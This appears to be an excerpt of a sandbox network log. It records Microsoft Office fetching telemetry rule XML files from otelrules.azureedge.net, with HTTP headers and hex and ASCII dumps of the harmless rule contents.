                                                                                                                                                                                                                                              2024-11-02 06:16:07 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 54 74 5d 5b 48 68 5d 5b 49 69 5d 5b 4e 6e 5d 5b 50 70 5d 5b 55 75 5d 5b 54 74 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120673" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <SR T="2" R="([Tt][Hh][Ii][Nn][Pp][Uu][Tt][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                              70192.168.2.46378813.107.246.45443
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-11-02 06:16:08 UTC192OUTGET /rules/rule120674v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                              2024-11-02 06:16:08 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:16:08 GMT
                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                              Content-Length: 474
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                                                                                                                                              ETag: "0x8DC582BA4037B0D"
                                                                                                                                                                                                                                              x-ms-request-id: 897845c9-601e-000d-5428-2c2618000000
                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                              x-azure-ref: 20241102T061608Z-r159446fcd7nszvrhC1DFW2d0g000000012g0000000006g7
                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              2024-11-02 06:16:08 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120674" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                              71192.168.2.46378913.107.246.45443
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-11-02 06:16:08 UTC192OUTGET /rules/rule120675v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                              2024-11-02 06:16:08 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:16:08 GMT
                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                              Content-Length: 419
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                                                                                                                                                                                                                              ETag: "0x8DC582BA6CF78C8"
                                                                                                                                                                                                                                              x-ms-request-id: 38f7f1e0-301e-006e-2f08-2cf018000000
                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                              x-azure-ref: 20241102T061608Z-16ccfc49897jxxn9hC1DFWexyc00000001qg000000000c24
                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              2024-11-02 06:16:08 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 55 75 5d 5b 50 70 5d 5b 43 63 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 55 75 5d 5b 44 64 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120675" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <SR T="2" R="([Uu][Pp][Cc][Ll][Oo][Uu][Dd])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                              72192.168.2.46379013.107.246.45443
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-11-02 06:16:08 UTC192OUTGET /rules/rule120676v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                              2024-11-02 06:16:08 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:16:08 GMT
                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                              Content-Length: 472
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                                                                              ETag: "0x8DC582B984BF177"
                                                                                                                                                                                                                                              x-ms-request-id: 35c285af-301e-0051-5b08-2c38bb000000
                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                              x-azure-ref: 20241102T061608Z-16ccfc49897kh956hC1DFW2afc00000001r000000000fvuy
                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              2024-11-02 06:16:08 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120676" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                              73192.168.2.46379113.107.246.45443
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-11-02 06:16:08 UTC192OUTGET /rules/rule120677v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                              2024-11-02 06:16:08 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:16:08 GMT
                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                              Content-Length: 405
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:37 GMT
                                                                                                                                                                                                                                              ETag: "0x8DC582B942B6AFF"
                                                                                                                                                                                                                                              x-ms-request-id: c6a001d5-701e-0050-1608-2c6767000000
                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                              x-azure-ref: 20241102T061608Z-16ccfc498979lfwnhC1DFW56w800000001vg000000003g2q
                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              2024-11-02 06:16:08 UTC405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5e 5b 58 78 5d 5b 45 65 5d 5b 4e 6e 5d 24 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c
                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120677" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <SR T="2" R="(^[Xx][Ee][Nn]$)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                              74192.168.2.46379213.107.246.45443
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-11-02 06:16:08 UTC192OUTGET /rules/rule120678v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                              2024-11-02 06:16:08 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:16:08 GMT
                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                              Content-Length: 468
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                                                                                                                                                              ETag: "0x8DC582BBA642BF4"
                                                                                                                                                                                                                                              x-ms-request-id: 5d06df95-b01e-0084-4008-2cd736000000
                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                              x-azure-ref: 20241102T061608Z-16ccfc498978mvxwhC1DFWafzn00000001v0000000004rhn
                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              2024-11-02 06:16:08 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120678" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                              75192.168.2.46379313.107.246.45443
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-11-02 06:16:08 UTC192OUTGET /rules/rule120679v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                              2024-11-02 06:16:09 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:16:09 GMT
                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                              Content-Length: 174
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
                                                                                                                                                                                                                                              ETag: "0x8DC582B91D80E15"
                                                                                                                                                                                                                                              x-ms-request-id: c3d6966f-401e-0016-3ad8-2b53e0000000
                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                              x-azure-ref: 20241102T061609Z-16dc884887btswlthC1DFWs7xw00000001qg0000000095rq
                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              2024-11-02 06:16:09 UTC174INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 31 22 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 3c 2f 52 3e
                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120679" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> </S> <T> <S T="1" /> </T></R>


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                              76192.168.2.46379513.107.246.45443
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-11-02 06:16:09 UTC192OUTGET /rules/rule120680v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                              2024-11-02 06:16:09 UTC538INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:16:09 GMT
                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                              Content-Length: 1952
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                                                                                                                                                                                                                              ETag: "0x8DC582B956B0F3D"
                                                                                                                                                                                                                                              x-ms-request-id: b900ecb1-f01e-0099-29eb-2b9171000000
                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                              x-azure-ref: 20241102T061609Z-16ccfc49897wlhjjhC1DFWsx6c00000001m000000000dyrg
                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              2024-11-02 06:16:09 UTC1952INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 31 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120680" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <SS T="1" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> <R T="2" R="120682" /> <F T="3"> <O T="LT"> <L>


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                              77192.168.2.46379613.107.246.45443
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-11-02 06:16:09 UTC192OUTGET /rules/rule120681v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                              2024-11-02 06:16:09 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:16:09 GMT
                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                              Content-Length: 958
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:58 GMT
                                                                                                                                                                                                                                              ETag: "0x8DC582BA0A31B3B"
                                                                                                                                                                                                                                              x-ms-request-id: 0f62b768-101e-008e-3108-2ccf88000000
                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                              x-azure-ref: 20241102T061609Z-176bd8f9bc5nnctdhC1DFWuuh800000001sg00000000d7sz
                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              2024-11-02 06:16:09 UTC958INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 38 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a
                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120681" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120608" /> <R T="2" R="120680" /> <TH T="3"> <O T="AND"> <L> <O T="EQ"> <L>


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                              78192.168.2.46379713.107.246.45443
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-11-02 06:16:09 UTC192OUTGET /rules/rule120682v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                              2024-11-02 06:16:09 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:16:09 GMT
                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                              Content-Length: 501
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:18 GMT
                                                                                                                                                                                                                                              ETag: "0x8DC582BACFDAACD"
                                                                                                                                                                                                                                              x-ms-request-id: 6028abc9-b01e-0002-6508-2c1b8f000000
                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                              x-azure-ref: 20241102T061609Z-16ccfc49897wvnbhhC1DFWtfnn00000001kg00000000b17p
                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                              Accept-Ranges: bytes
